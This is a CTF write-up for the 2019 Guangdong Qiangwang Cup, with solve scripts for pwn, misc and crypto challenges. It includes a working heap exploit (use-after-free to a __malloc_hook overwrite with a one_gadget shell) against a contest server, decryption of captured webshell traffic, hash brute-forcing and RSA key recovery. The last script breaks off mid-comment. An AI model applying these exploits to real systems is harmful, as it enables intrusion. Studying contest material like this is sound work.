2019广东强网杯_wp

Pwn

pwn1

  • Run函数有个条件竞争,可以泄漏libc,后面libc换了2.27,所以条件竞争配合uaf写fd指针到__malloc_hook然后改为one_gadget即可

from pwn import *
context.log_level = 'debug'

#p = process('./pwn1')
# Challenge endpoint used at the time of the CTF; swap in the commented
# process() line to run against the local binary instead.
p = remote('119.61.19.212',8087)

def sl(x):
    """Send *x* followed by a newline on the connection ``p``."""
    p.sendline(x)

def ru(x):
    """Consume input from ``p`` up to and including the delimiter *x*."""
    p.recvuntil(x)

def se(x):
    """Send *x* on ``p`` as-is, without a trailing newline."""
    p.send(x)

def malloc(idx,cont):
    """Menu option 1: allocate slot *idx* and fill it with *cont*.

    Waits for the ``run`` prompt first, so the previous command must have
    been fully answered by the service.
    """
    ru('run\n')
    sl('1')
    ru('index:\n')
    sl(str(idx))
    ru('content:\n')
    sl(cont)

def free(idx):
    """Menu option 2: free slot *idx*."""
    ru('run\n')
    sl('2')
    ru('index:\n')
    sl(str(idx))

def run(idx,cont):
    """Menu option 3: run slot *idx* with key *cont*.

    The key is sent with ``se`` (no trailing newline), unlike the other
    helpers which use ``sl``.
    """
    ru('run\n')
    sl('3')
    ru('index:\n')
    sl(str(idx))
    ru('key:\n')
    se(cont)


# Nine allocations; the trailing comments are the author's slot numbers.
malloc(0,'aaa') #0
malloc(1,'bbb') #1
malloc(2,'ccc') #2
malloc(3,'ddd') #3
malloc(4,'eee') #4
malloc(5,'fff') #5
malloc(6,'666')
malloc(7,'777')
malloc(8,'888')

for i in range(1,8):
    free(str(i))

# Run slot 0, then free it; the 6 bytes echoed after the next prompt are
# zero-extended to 64 bits and used as the libc leak.
run(0,'a'*8)
free(0)
ru('run\n')
leak_libc = u64(p.recv(6).ljust(8,'\x00'))
info('leak libc : 0x%x'%leak_libc)
# The constants below are specific to the libc 2.27 build the write-up mentions.
libc_base = leak_libc - 96 - 0x3ebc40
info('libc base : 0x%x'%libc_base)
one_gadget = libc_base + 0x4f322
malloc_hook = libc_base + 0x3ebc30


# Same sequence as malloc(1, '1'), sent by hand because the 'run\n' prompt
# was already consumed by the leak above.
sl('1')
ru('index:\n')
sl('1')
ru('content:\n')
sl('1')

for i in range(2):
    malloc('1','1')

# Second leak with the same run-then-free pattern, this time a heap address.
run(1,'a')
free(1)

ru('run\n')
leak_heap = u64(p.recv(6).ljust(8,'\x00'))
info('leak heap : 0x%x'%leak_heap)

sl('1')
ru('index:\n')
sl('2')
ru('content:\n')
sl('2')

info('malloc hook : 0x%x'%malloc_hook)
run(2,str(malloc_hook^leak_heap))
free(2)

sleep(2)
malloc(5,'a')
malloc(6,p64(one_gadget))

# Final allocation request, after which the session is handed to the user.
ru('run\n')
sl('1')
ru('index:\n')
sl('0')
#gdb.attach(p)
p.interactive()

Misc

完美的错误

  • 题目描述去除混淆的编码,于是联想到base58,又说错位,所以改一下字符集顺序爆破
# Bitcoin's base58 alphabet: digits and letters without the look-alikes
# 0, O, I and l.  The main block below rotates it to try the "misaligned"
# variants the challenge hints at.
__b58chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
__b58base = len(__b58chars)


def b58encode(v):
    """Encode the byte string *v* into base58 using the module alphabet.

    Leading NUL bytes are preserved as leading ``__b58chars[0]`` characters,
    the same leading-zero convention Bitcoin addresses use.
    """
    number = int(v.encode("hex_codec"), 16)

    # Collect digits least-significant first, then reverse once.
    digits = []
    while number >= __b58base:
        number, remainder = divmod(number, __b58base)
        digits.append(__b58chars[remainder])
    digits.append(__b58chars[number])
    digits.reverse()

    zero_prefix = len(v) - len(v.lstrip('\0'))
    return __b58chars[0] * zero_prefix + "".join(digits)


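def b58decode(v):
    """Decode the base58 string *v* into a string of bytes.

    Leading ``__b58chars[0]`` characters map back to leading NUL bytes.

    Raises ValueError for a character outside the current alphabet; the
    original used ``str.find`` and silently treated such a character as the
    digit -1, which produced a wrong result instead of an error.
    """
    # Horner's rule over the digits, most significant first.
    number = 0
    for c in v:
        digit = __b58chars.find(c)
        if digit < 0:
            raise ValueError("invalid base58 character: %r" % c)
        number = number * __b58base + digit

    # Split the integer into bytes, least significant first, then reverse.
    out = []
    while number >= 256:
        number, byte = divmod(number, 256)
        out.append(chr(byte))
    out.append(chr(number))
    out.reverse()

    zero_prefix = len(v) - len(v.lstrip(__b58chars[0]))
    return chr(0) * zero_prefix + "".join(out)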

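def pailie(a):
    """Rotate the sequence *a* left by one position (``a[1:] + a[0]``).

    Used to permute the base58 alphabet between brute-force attempts.
    An empty input is returned unchanged; the original raised IndexError.
    """
    return a[1:] + a[:1]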

if __name__ == "__main__":

    # Try all 58 cyclic rotations of the alphabet and print the decode under
    # each one; the correct rotation is picked out by eye.  Rebinding the
    # module-level name is what b58decode reads, so this changes its alphabet.
    for i in range(58):
        __b58chars = pailie(__b58chars)
        #print b58encode("hello world")
        print b58decode("RJv9mjS1bM9MZafGV77uTyDaapNLSk6t358j2Mdf1pbCByjEiVpX")

撸啊撸

  • 题目是个图片,拿到以后发现文件头多了点东西,猜测是文件修复

a = '938gce1`872db99db`b342d23c0g9g2d'
# Flip the lowest bit of every character of the recovered string.
flag = "".join(chr(ord(c) ^ 1) for c in a)

print('flag{'+flag+'}')

脑筋急转弯

  • 拿到一个wav文件,猜测是wav隐写,最后用silenteye得到一个压缩包,爆破得到密码654321,然后打开压缩包有个txt

  • 012换成.!?,然后ook,brainfuck解码

抓灰阔

  • 一个流量包,仔细找传输的文件,发现main.jsp,再上网找资料,发现是冰蝎一句话木马,所以目前key和加密的payload有了,逐一解密payload
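import base64

from Crypto.Cipher import AES

# AES key recovered from the captured webshell traffic (see the write-up).
key = 'ba4ae3277932b0a2'

# The captured payload is base64 text wrapping an AES-ECB ciphertext; one
# cipher object is enough (the original built two and never used the first).
decipher = AES.new(key, AES.MODE_ECB)

with open('./data/flag.enc', 'rb') as f:
    msg = base64.b64decode(f.read())

# ECB has no IV and no integrity check, so a wrong key yields garbage rather
# than an error: inspect the printed bytes before trusting the output file.
b = decipher.decrypt(msg)
print(b)

# Decrypt once, write once; the original decrypted twice and never closed
# the output file explicitly.
with open('./data/flag_dec.class', 'wb') as f:
    f.write(b)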
  • 本来想逐一反编译class为java文件,突然发现参数是写在class文件中的,然后找到一个串加密的payload中有上传一个flag文件

写脚本解密

Crypto

强大的hash

  • 给了个hash,需要我们写脚本爆破,这里有个坑点是hash加密类型是$argon2d,不支持php
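import sys
from itertools import product

from argon2 import PasswordHasher
from argon2.exceptions import VerifyMismatchError

# Candidate number fragments for the flag pattern CTF_<a>_<b>.
# (Renamed from `list`, which shadowed the builtin.)
candidates = ["114","119","110","120","121","122","170","189","180","133","144","911"]

ph = PasswordHasher()
# $argon2d with t=100, m=32768: the write-up notes PHP's password_verify
# does not support this variant, hence the python binding.
# (Renamed from `hash`, which shadowed the builtin.)
target_hash = "$argon2d$v=19$m=32768,t=100,p=1$MTIzNDU2Nzg$iuSRO5tkWxBxqgkI5g9O5ZersA//xvgvrKxH8QuxBBI4yKbG4aRFqITP/Rh5giFRuL9PTJP+/0BUfNwZHzx9bQ"

# Same i-outer / j-inner order as the original nested loops.
for i, j in product(candidates, repeat=2):
    guess = 'CTF_' + i + '_' + j
    print(guess)
    try:
        # verify() returns True on a match and raises on a mismatch.
        if ph.verify(target_hash, guess):
            print('done : %s' % guess)
            sys.exit(0)
    except VerifyMismatchError:
        # Wrong guess; any other error (e.g. an unsupported hash string) is
        # no longer swallowed, so a broken setup fails loudly instead of
        # silently running through every candidate.
        continue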

遗失的秘密

#!/usr/bin/python
#-*- coding:utf-8 -*-

import re
import pickle
from itertools import product
from libnum import invmod, gcd


def solve_linear(a, b, mod):
    """Solve ``a * x == b`` modulo *mod*, where *mod* is a power of two.

    Returns None when either operand is even: an even *a* has no inverse
    modulo a power of two, and the caller only needs the odd/odd case.
    """
    if not (a & 1 and b & 1):
        return None
    # Reduce with `& (mod - 1)`; this is the power-of-two shortcut the
    # original comment calls a "hack".
    inverse = invmod(a, mod)
    return (b * inverse) & (mod - 1)


def to_n(s):
    """Parse a colon/whitespace separated lowercase hex dump into an int.

    Everything that is not a lowercase hex digit (colons, newlines, spaces)
    is dropped before conversion; upper-case digits are not accepted.
    """
    hex_digits = [ch for ch in s if ch in "0123456789abcdef"]
    return int("".join(hex_digits), 16)


def msk(s):
    """Turn a colon separated dump with blank (unknown) bytes into
    ``(per-nibble ranges, known-nibble mask, known-nibble value)``.

    Each ':'-separated field is reduced to its last two characters, so a
    known byte such as ``ab`` is kept and a blank field becomes spaces,
    which the ``msk_*`` helpers treat as wildcard nibbles.
    """
    fields = s.split(":")
    cleaned = "".join([field[-2:] for field in fields])
    ranges = msk_ranges(cleaned)
    known_mask = msk_mask(cleaned)
    known_val = msk_val(cleaned)
    return ranges, known_mask, known_val


def msk_ranges(s):
    """Map each nibble character of *s* to its candidate digits.

    A blank means any of the 16 digits; anything else is the single hex
    digit it names (ValueError if it is not a hex digit).
    """
    choices = []
    for ch in s:
        if ch == " ":
            choices.append(range(16))
        else:
            choices.append([int(ch, 16)])
    return choices


def msk_mask(s):
    """Return the int whose hex digits are ``f`` where *s* has a known
    nibble and ``0`` where it has a blank (the known-digit mask)."""
    digits = []
    for ch in s:
        digits.append("0" if ch == " " else "f")
    return int("".join(digits), 16)


def msk_val(s):
    """Return the int whose hex digits are the known nibbles of *s*, with
    ``0`` in every blank position (to be compared under msk_mask)."""
    digits = []
    for ch in s:
        digits.append("0" if ch == " " else ch)
    return int("".join(digits), 16)


# Public exponent of the target key.
E = 65537

# Modulus dump copied from the damaged key file (colon separated hex, fed
# through to_n()).  The final byte is missing from the dump and is
# brute-forced by the loop at the bottom of the script.
N_ = """00:c4:9d:36:a4:77:76:12:12:85:24:6c:74:1d:7d:
b3:ce:f4:c3:a4:69:cd:0b:2e:8f:d6:75:e3:80:b8:
e8:1c:ce:e8:60:90:45:56:73:ab:32:32:00:7f:6a:
76:3e:b6:10:d3:a2:74:da:f9:4e:a5:7e:ae:ef:f4:
da:82:57:6d:68:82:50:d8:b1:fc:92:b1:5c:7d:54:
f5:7e:d0:06:8a:60:ff:82:70:72:20:68:4b:71:ba:
87:44:57:c1:97:a0:8a:2d:53:93:f3:0a:60:87:a3:
85:c8:45:e6:0a:88:85:b5:ff:c7:09:9a:76:03:fe:
99:b6:fb:8a:1e:9f:a8:42:3a:0a:c9:a9:bf:1c:87:
2c:c4:99:10:db:46:e3:a9:a5:79:93:8c:75:71:ec:
c6:3b:af:44:dc:60:c4:53:f6:3c:e8:73:2f:50:10:
38:e7:6f:d0:a5:4b:ae:e3:1e:43:11:42:2c:a2:38:
e6:3f:0b:13:54:63:e8:2f:9e:61:ab:08:65:97:e0:
27:30:19:fd:a7:fe:5c:d8:11:b8:34:87:ad:02:c2:
bc:cd:73:d3:86:be:fd:2a:b4:fe:7d:7e:d3:64:bb:
6f:63:ed:a6:1d:ee:f2:80:da:9d:7a:23:7f:c1:39:
b0:98:0c:85:8f:d0:4b:9f:e4:1a:26:fc:44:d1:67:
03:32:03:0c:91:61:23:4c:81:6f:42:18:88:41:dc:
27:55:a3:07:7c:a1:ad:f3:58:4d:91:07:65:f1:63:
f2:34:d5:17:0e:59:c6:bb:b6:6d:7d:0c:d2:64:4b:
b9:9c:52:59:03:8e:2a:43:23:76:33:c3:e8:72:3b:
1c:e0:40:97:36:5f:ae:00:d7:e3:09:eb:df:55:44:
22:b4:09:00:b5:09:41:70:6c:5c:3b:98:d3:34:7e:
60:a2:b8:93:bd:af:32:77:48:48:8a:a5:9c:0e:6a:
a1:79:36:86:8c:e9:3f:b1:a2:a7:4a:3a:d8:d6:f6:
dd:62:d8:ae:9e:13:bb:0c:6b:b1:65:68:0d:7e:58:
3f:68:1e:91:49:13:19:68:2b:fd:3c:5e:52:fa:76:
b0:57:fc:0e:35:d8:71:56:41:06:ef:50:99:56:dd:
d4:9a:1f:d3:46:26:12:9c:15:4b:43:fc:1b:de:c9:
06:ad:82:56:63:c8:a4:83:32:d2:35:05:23:15:52:
d9:0a:73:85:5e:c9:c2:56:af:69:d2:5f:77:04:28:
c8:4c:b9:a6:d4:15:15:b5:15:99:13:ef:a9:a5:de:
5a:74:b1:03:cf:32:a5:03:69:f8:e9:bb:7e:16:31:
5e:43:e7:02:51:ac:c5:f6:bf:ef:1c:74:f7:13:0c:
19:ad:"""





# Partially known private-key components, in the same colon separated
# layout as N_ with blank fields for the unreadable bytes.  msk() turns
# each into (per-nibble candidate ranges, known-nibble mask, known value);
# only p's candidate ranges are enumerated, the others are used as checks.
#
# NOTE(review): msk() keeps the last two characters of every ':'-separated
# field, so an unknown byte has to be written as two blanks (one per
# nibble) and the continuation lines need their leading indentation; the
# whitespace looks collapsed in this copy of the script, so confirm the
# dumps against the original file before rerunning it.
p_ranges, pmask_msk, pmask_val = msk("""00: :05:89: :bd:35: : :23: : : : :84:
: :ed: :70:14: : : :10: : :87: :51:
ea: :97:69: :52: : : : : :ea: : :15:
: :34: :be:11:23: : :34:14: :94: :10:
: :74:87:37:ee:81:62:ee:95: : :dc:49:dd:
: :35: :81: :fa: : : :86: : : :fb:
:93: : :12: :14: :ab:76: :96: : :27:
:21: :04:01:41: :98: :ff: : :12:dc: :
cd: :39:95:30: :47: :fa:ff: :34: :ad: :
:52:02:fa:bc:14:22:22:48:61:62:bd:53: : :
72:08:cb:41:88: : : :63:91:30:fe: : :42:
87: :18:52: :39:dd: :68: :fe:06:88:81: :
: : :ae:fd: : :fb:21:37:59: :53: :fa:
:07:40:eb:33:77:51:64:10:dd: :73: :86:62:
:bf: :79: :34: :bb: :44:ff: :46:fe:90:
ef: :52:ad: : :fe: :69:18:89:bd:cd:09:46:
: :74:71: : : :41:66: : :11: :25: :
39:8b""")

# q is never enumerated directly: it is derived from each p candidate and
# checked against this mask.
q_ranges, qmask_msk, qmask_val = msk("""00:ce:43:ef: :76:58:17:43:31: : :32:70: :
89: : :36:55:06: :79:66:78: : : : : :
:85: : : : : :33:bb: : :56: :66:cb:
:08: : :90:cb: : :24:fa:ca:47: : : :
:88: :83:01: :62: : : : : : :ad:ae:
: : :58: :ec: : : :09:04:86: :05:00:
:df:50:84:81:80: :ae: :24: :94:da: :04:
ce: :ef: : :ed:be:bf:43:78: : :05:93: :
08:52:05: : : : :ae: : : : :ab: : :
:76:ce: : : : :19:bd:22: :ef:dc:bf:ea:
ab:78:01: : :85: : : :ea: : :fb: : :
92:66:19: : :ab: : :82: : :31: : :da:
82: :13:82:43: : :94:13:41: : : :37: :
:04:56:02:87:dd: :58:27: : :24: : : :
28: : :09:14:89: : : :49:59: :16:eb:65:
:01:22: : :dd: :78: : :db:90: :ac: :
:fd: :03:74: : : : :92: :00:ba: : :
:05""")

# Private exponent d; only the mask/value pair is used (check_level >= 2).
_, dmask_msk, dmask_val = msk("""11: : :69:62:64: : : : :15: :13:de:de:
cf: : :17: : :75: :98:42:fc: :12:15:08:
: : : : :36: :be:25:48: : :19: : :
:47:11:19: :03: :49:fc:da: :96:45:eb: :
: : :91: :ea: : :55:ff: :37:58: : :
19: : :73:40: :91:15:01:da:91:22:fd:32: :
: :50: : :66: : : :42: : :ef: : :
df:42: :97:30: :39: : : : : : :dc: :
: : : : :38: : : :88:28: :05: : :
78:59:fa: :86: :19:24: : : : :da:cf:15:
39: : : : :ef:55: :ce:47: :58:89: :fb:
:24: : : :92: : :ee: : :db:67:31:ce:
:28: :72:ec:89: :04: : :50: : : : :
:37: :44: : : : :56: :38: :bb:47:bb:
66:83:99:22:07:72: : :48:52:02: : : :29:
:82:56: :67: :95: : :56:94: : :71: :
bf:27:98: : :54:98:26:06:87: :ae: :53:be:
: :80:37:60:61:ea:ef:de: : :df:90:81: :
70: :06:33:26: :75:fe:95: :92: :78:cd:05:
64:cc:68: : :36:54: :bd:16:90:ee:60: : :
: :41: : :91: :79:58:06:50: :46: : :
45: :09:ca:ac:16: :27:98: : :ba:82: :77:
93:98:ad: :15: :67:53:97:ad:ee:50:44: :31:
07: :ff:01: :09: : : : : :46: : :42:
15: :db:df:42:be: : : :78: :41: : : :
:14: : :25:fc: :84: : : : : : :20:
da:46:01:eb:87: :12:57: : :56:af: :87:93:
60: :02: :18:89:63:72:ad: :ed:cf: : :84:
:22: :13: : :dd: :ff: : : :de:62:37:
:19:66: : :86:02: :38: : : : :ec:14:
12: :43:93:19:65:98: : :03: : : :ef: :
: :ca:07:92:22: : :bb:15:eb: : : :35:
:72:29:cd: : :99: : : : :41:06: : :
:43:33: :32: : :54:be:92:62: :78:59:42:
79:89""")

# CRT exponent dp = d mod (p-1); checked at check_level >= 3.
_, dpmask_msk, dpmask_val = msk(""" :39: :28:16:02:89:ce:11:fe: : : : :af:
: : :ed:97: : :11:20:ba:ae:98:ad: : :
:10:87:ac:07: : : : :50: : :70:50:52:
df:89:eb:02: : : : :93:11: : :12: :56:
:08: : :ea: :10:fa:19: : : :54:45:07:
: :bc:ff:33: :db:63:49:fe:52: :33: : :
bf:cd:45:91: :10: : :92:81:40:03: :80: :
29: :30: :ed:43:64:ca: :bf:64: : :bf: :
: : :24:72:84: : :ff: : :24: :81:27:
db:23: :64: :67: :ba: : :bc: : : : :
:ae:88: : : : : :91: : :14: :ba:ef:
:89: : : : : : : : :05: :75:52: :
: : :be:ad:df: :02:88:00: : :15:45: :
cf:32: :ca: :93: :32: :40: :27:dd: :19:
73:dc: : : : : :cf: : :dd: : :ca: :
ee: :ca: : : :49: :27: :58:53: :64:25:
:22:06:16:ff:62:bc: : : : :24:fc: : :
df""")

# CRT exponent dq = d mod (q-1); checked at check_level >= 4.
_, dqmask_msk, dqmask_val = msk("""02: :bd: :19:25:98:75: :65: :55:28:33:bc:
34:84:91:01:96: : :08: :32:45: :27: : :
:fe: :bb:63:32:68: :51:bd:75:40: :52:52:
: : :78:85:fc:94: :07: :14: : : : :
15:dd: : :93: :01: : :77:ca: :40: :da:
:89:bc:87:62:dc:ac:61:88: : :70: :69: :
:36: : :21:08: :dc:73: :ad:da:ee:fe: :
96: :58: : :46: :29:ff:97:ce: : : :cb:
51: : :81: :22: : :19: :10:69:41:36:ca:
:22:49: :cc:cf:06: : :08: :76: : :45:
98: : :45: : : :69:13:65: : :da:54: :
19: :ee:24: :73: : : : : : :18:53:40:
21:25: : :84:52:cd: :49:33:78: : :ed: :
25:27: : : :ca: : : :ca: : :bc: :02:
31:70: :10:ca:84:59: : : :52: :27:76: :
47: :66:bf:ff: :03: :99:ff: :df: : : :
:46:27:45: :65:07: :48:da:dc: :80: : :
f9""")


def search(K, Kp, Kq, check_level, break_step):
    """Rebuild p nibble by nibble from its low end, pruning every partial
    candidate against the known nibbles of p, q, d, dp and dq.

    Reads the module globals N, E, p_ranges and the *mask_msk / *mask_val
    pairs defined above.  K, Kp and Kq are candidate multipliers in
    e*d = 1 + K*phi(N), e*dp = 1 + Kp*(p-1) and e*dq = 1 + Kq*(q-1); they are
    consulted only when check_level is >= 2, 3 and 4 respectively.

    Returns True when at least one candidate survives all break_step
    nibbles and False when the candidate set dies out earlier.  If a pair
    with p*q == N is met on the way, the full key is printed and the whole
    process is terminated with quit() instead of returning.
    """
    max_step = 0
    cands = [0]
    for step in range(1, break_step + 1):
        #print " ", step, "( max =", max_step, ")"
        # max_step only feeds the commented-out progress print.
        max_step = max(step, max_step)

        # All checks are done modulo 16**step, i.e. on the lowest `step` nibbles.
        mod = 1 << (4 * step)
        mask = mod - 1

        cands_next = []
        # p_ranges is indexed from the end so the low nibble is tried first.
        for p, new_digit in product(cands, p_ranges[-step]):
            pval = (new_digit << ((step - 1) * 4)) | p

            # check_level < 1 is never used by the callers; it would leave
            # qval unbound for the p*q == N test below.
            if check_level >= 1:
                # q = N * p^-1 modulo the current power of two.
                qval = solve_linear(pval, N & mask, mod)
                if qval is None or not check_val(qval, mask, qmask_msk, qmask_val):
                    continue

            if check_level >= 2:
                # d from e*d = 1 + K*(N - p - q + 1).
                val = solve_linear(E, 1 + K * (N - pval - qval + 1), mod)
                if val is None or not check_val(val, mask, dmask_msk, dmask_val):
                    continue

            if check_level >= 3:
                # dp from e*dp = 1 + Kp*(p - 1).
                val = solve_linear(E, 1 + Kp * (pval - 1), mod)
                if val is None or not check_val(val, mask, dpmask_msk, dpmask_val):
                    continue

            if check_level >= 4:
                # dq from e*dq = 1 + Kq*(q - 1).
                val = solve_linear(E, 1 + Kq * (qval - 1), mod)
                if val is None or not check_val(val, mask, dqmask_msk, dqmask_val):
                    continue

            # Only true once every nibble of both factors has been recovered.
            if pval * qval == N:
                print "Kq =", Kq
                print "pwned"
                print "p =", pval
                print "q =", qval
                p = pval
                q = qval
                d = invmod(E, (p - 1) * (q - 1))
                coef = invmod(p, q)

                # Python 2 only: `long` and this pycrypto construct() tuple form.
                from Crypto.PublicKey import RSA
                print RSA.construct(map(long, (N, E, d, p, q, coef))).exportKey()
                # Ends the whole process, not just this call.
                quit()

            cands_next.append(pval)

        if not cands_next:
            return False
        cands = cands_next
    return True



def check_val(val, mask, mask_msk, mask_val):
    """Return True when the nibbles of *val* selected by *mask* agree with
    the known nibbles described by *mask_msk* / *mask_val*.

    Nibbles outside *mask* (not yet recovered) and nibbles that are unknown
    in the dump (zero in *mask_msk*) are ignored.
    """
    relevant = mask & mask_msk
    expected = mask & mask_val
    return (val & relevant) == expected


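# K = 4695
# Kp = 15700
# Kq = 5155

# The dump of N lacks its last byte, so every value of that byte is tried.
# For each candidate modulus the multipliers K, Kp and Kq are brute-forced
# in turn, each stage reusing the values found by the previous one; search()
# prints the key and exits the process as soon as p*q == N.
for i in range(0x100):  # the original used range(0xff) and never tried 0xff
    N = to_n(N_ + "%02x" % i)
    print("index :  %d" % i)

    for K in range(1, E):
        if search(K, 0, 0, check_level=2, break_step=20):
            print("K = %d" % K)
            break
    else:
        # No K survived 20 nibbles: this last byte is wrong.  The original
        # fell through and ran the Kp/Kq loops with a stale K, which could
        # never succeed because the same level-2 check had already failed.
        continue

    for Kp in range(1, E):
        if search(K, Kp, 0, check_level=3, break_step=30):
            print("Kp = %d" % Kp)
            break
    else:
        continue

    for Kq in range(1, E):
        if search(K, Kp, Kq, check_level=4, break_step=9999):
            print("Kq = %d" % Kq)
            break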
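#!/usr/bin/python
# coding=utf-8
import binascii

import gmpy2
from Crypto.Cipher import PKCS1_OAEP
from Crypto.PublicKey import RSA

# Factors recovered by the search script above.
p = 30804877236372761296348297513767908130120426767441642194038947059431749919743933282721728129660558520306627781991434638545287122418576024822599938752655436891429241798416041881441469038271460545196755187872022209260074336340748692939443634393492611052850561312058115000234467417922716845989845380178291512893577636848676778152648705150749219629638913963012345388388992649857974643758097581431795569765569985118215469798809551704275008726932734117893757436777110974529289423114881289423038562352073193732977840168067817149865622380253870276206212656648830136975036452877460473463818007722056777837507566352911184181643
q = 26038591288856688238001759665609016744197175469090080494077820415283745172609947555684568450035539489682168553390403854805974969118763740560638548072896648612347287461822059996717273680094814363090434263883250281614203478279438635312321752371517752177819983938115532573238089291708699056464231184039223531822571471611431921747169774540943776543504663419138030516108434288911593973010680364553026970545232818747951718950151516127319881685156986937644295056292836729469548074713781625918117631575942194589642230959265894967721587381648790905383499092379075578245308113268969812469233669312409066969648987454629639842309

N = p*q
e = 65537

# Private exponent from the factorisation.
phin = (p-1)*(q-1)
d = gmpy2.invert(e, phin)
# Alternative the author did not use: load the reconstructed key and
# decrypt through PKCS1_OAEP.
# with open('private.pem', 'r') as f:
# private = RSA.importKey(f)
# oaep = PKCS1_OAEP.new(private)

with open('flag.txt.en', 'rb') as f:
    data_enc = int(binascii.hexlify(f.read()), 16)

# Textbook RSA on the whole file as one integer: no padding is checked, so
# a wrong d just yields garbage rather than an error.
plain = gmpy2.powmod(data_enc, d, N)
# '%x' on int() avoids the trailing 'L' that hex() puts on Python 2 longs.
plain_hex = '%x' % int(plain)
# unhexlify needs an even digit count; a leading zero nibble is dropped by '%x'.
if len(plain_hex) % 2 != 0:
    plain_hex = '0' + plain_hex
print(binascii.unhexlify(plain_hex))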

美好的回忆

利用第二段 爆破key,然后解密

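#coding:utf-8

# Known plaintext of the second 8-byte block (the write-up says the key is
# brute-forced "from the second segment").
raw ="ood time"

# Ciphertext of that block and the chaining value that precedes it.
two = [0xCD, 0xD9, 0x3B, 0x0A, 0xCF, 0xAA, 0x2A, 0x1E]

iv = [0x55, 0xE5, 0x9E, 0x0E, 0x27, 0x8A, 0x34, 0x63]

#通过iv 和 密文 和 原文 可以算出 key
# The scheme decrypts as plain = prev_cipher ^ key ^ cipher, so with a known
# block every key byte is simply two ^ iv ^ plain.  The original looped j
# over 0..255 looking for that byte; the XOR equation has exactly one
# solution, so the result is identical.

key = [ord(c) for c in raw]

t_key = [two[i] ^ iv[i] ^ key[i] for i in range(8)]

print(t_key)


BLOCKS = 7  # 8-byte blocks decrypted after the leading 8-byte chaining value

with open('flag.txt.encrypted', 'rb') as f:
    # bytearray gives ints on both Python 2 and 3, so no ord() is needed.
    prev = bytearray(f.read(8))

    flag = ''
    for _ in range(BLOCKS):
        enc = bytearray(f.read(8))
        for i in range(8):
            flag += chr(prev[i] ^ t_key[i] ^ enc[i])
        prev = enc

print(flag)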

悲伤的结局

  • 爆破 最后的padding 其他和上一题一样
#coding:utf-8


# print 19 ^ 24 ^ 1
# exit()



# Known plaintext fragment: the tail of the message, whose last block ends
# in the padding the loop below brute-forces.
raw ="keep away from xiaocui!"

# raw = "have a good time.flag{21cb8c804abb60be5c9befcc928ccf5b}"


# Cipher block length in bytes.
BLOCK_SIZE =8

def pad(data):
    """Append PKCS#7 style padding so that ``len(data)`` becomes a multiple
    of BLOCK_SIZE.

    A full extra block is appended when *data* is already aligned.
    """
    missing = BLOCK_SIZE - (len(data) % BLOCK_SIZE)
    filler = chr(missing) * missing
    return data + filler.encode()

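#存在8种可能性
# The final block of the known text can end at any of 8 padding offsets, so
# the loop slides the 8-byte window of known plaintext once per offset,
# derives a key for each and prints every decryption for a human to pick.
# NOTE(review): the script's indentation was lost when it was pasted; the
# loop body is assumed to extend through the final print, with exit() after
# the loop.

# Chaining value and ciphertext block the key is solved against.  The
# original reassigned these several times and listed further blocks as bare
# expressions (no-ops); only the last pair was live.  The earlier values,
# presumably the file's other ciphertext blocks, are kept here as a record:
#   iv  = [0x15,0xEC,0x98,0x1C,0x6E,0xCD,0x6A,0x35]
#   two = [0xDB, 0xDD, 0x3C, 0x5E, 0x91, 0xE7, 0x20, 0x1F]
#   two = [0x14, 0xED, 0x9E, 0x1C, 0x38, 0xCC, 0x2E, 0x0D]
#   two = [0xF7,0x84,0x4B,0xE5,0x61,0x93,0x7B,0x98]
#   iv  = [0x0A,0x23,0x86,0xED,0xB9,0xFF,0x9D,0x81]
#   two = [0xED, 0x80, 0x4A, 0x97, 0x0C, 0xF6, 0x10, 0xFF]
#   two = [0x45, 0x2F, 0xD1, 0xF4, 0xA9, 0xBE, 0x94, 0x90]
#   [247, 83, 193, 36, 156, 73, 115, 24]
#   two = [0xEB,0xB6,0x57,0x30,0xAC,0x8D,0x55,0x1D]
#   iv  = [0x14,0xED,0x9E,0x1C,0x38,0xCC,0x2E,0x0D]
#   [0xE5, 0x20, 0xD1, 0x51, 0x08, 0xDB, 0x11, 0xF3]
#   [0x56, 0x04, 0xEB, 0xA1, 0xDA, 0xB7, 0xFD, 0xF7]
#   [0xFD, 0xA7, 0x71, 0xBC, 0x13, 0x9E, 0x13, 0xBC]
#   [0x4C, 0x08, 0xAE, 0xA6, 0x92, 0xBC, 0xFC, 0xA3]
#   [0xB1, 0xBA, 0x66, 0xBA, 0x5F, 0x89, 0x5C, 0xA1]
#   [0x02, 0x5C, 0xA8, 0xBB, 0x9B, 0xAC, 0xAE, 0xEA]
#   [0xB7, 0xFF, 0x73, 0xA0, 0x4E, 0x93, 0x02, 0xA1]
#   [0x08, 0x4C, 0xBD, 0xE9, 0x86, 0xB1, 0xA2, 0xBE]
#   [0xBD, 0xEF, 0x6E, 0xF2, 0x07, 0x98, 0x5B, 0xB0]
#   [0x13, 0x07, 0xDE, 0xCC, 0xCE, 0xBD, 0xB8, 0xB3]
#   [0xE2, 0xE1, 0x05, 0xD6, 0x4F, 0x85, 0x50, 0xBD]
#   [0x46, 0x07, 0xD4, 0xD6, 0x9D, 0xBA, 0xFC, 0xF6]
#   [0xF8, 0xAE, 0x00, 0xCC, 0x49, 0x9B, 0x19, 0xB3]
#   [0x2F, 0x0E, 0xD6, 0xC4, 0x8F, 0xAC, 0xA9, 0xBD]
#   [0xCA, 0xFA, 0x0A, 0x9C, 0x4B, 0xD5, 0x4B, 0xE1]
#   [0x22, 0x0A, 0x88, 0xCD, 0x88, 0xAD, 0xAE, 0xBC]
#   [0x9B, 0xFF, 0x0B, 0xC7, 0x19, 0xD9, 0x48, 0xE6]
#   [0x70, 0x0C, 0x80, 0xCD, 0x81, 0xA6, 0xB5, 0x87]
#   [0xFE, 0xA5, 0x1A, 0xFD, 0x4F, 0x9F, 0x5B, 0x8B]
#   [0x0F, 0x30, 0xCF, 0xB4, 0xBD, 0xBA, 0xB6, 0x90]
#   [0xBE, 0x93, 0x59, 0x8E, 0x73, 0xD6, 0x78, 0x9A]
#   [0x0A, 0x23, 0x86, 0xED, 0xB9, 0xFF, 0x9D, 0x81]
#   [0xED, 0x80, 0x4A, 0x97, 0x0C, 0xF6, 0x10, 0xFF]
iv = [0xF7, 0x84, 0x4B, 0xE5, 0x61, 0x93, 0x7B, 0x98]
two =[0x45, 0x2F, 0xD1, 0xF4, 0xA9, 0xBE, 0x94, 0x90]

for i in xrange(8):
    print('--------------------')
    n = i + 1
    # 8-byte window of known text ending n bytes before the end of raw.
    raw_last = raw[-n-8:-n]
    print(raw_last)
    # NOTE(review): pad() of an 8-byte window returns 16 bytes and only the
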